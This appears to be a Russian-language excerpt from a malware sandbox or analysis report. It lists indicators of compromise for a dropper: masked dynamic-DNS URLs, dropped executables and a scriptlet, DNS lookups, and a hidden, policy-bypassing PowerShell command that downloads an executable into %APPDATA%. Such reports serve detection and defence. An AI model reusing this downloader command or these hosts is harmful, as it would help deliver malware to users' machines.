Техническая информация
- http://ma######hilala.ddnsgeek.com/dlmwptb_signed_tw.exe как %appdata%\dlmwptb_signed_tw.exe
- ieinstal.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\dlmwptb_signed_tw.exe
- http://ma######hilala.ddnsgeek.com/dlmwptb_Signed_tw.exe
- http://sp#######nce-cloud.gleeze.com/buts/71qWCcTcD1gIFZIEsa2yFFvgXpYFs50JT6ukG/dlmw
- DNS ASK ma######hilala.ddnsgeek.com
- DNS ASK sp#######nce-cloud.gleeze.com
- '%APPDATA%\dlmwptb_signed_tw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma######hilala.ddnsgeek.com/dlmwptb_Signed_tw.exe','%APPDATA%\dlmwptb_...' (со скрытым окном)
- '%ProgramFiles(x86)%\internet explorer\ieinstal.exe'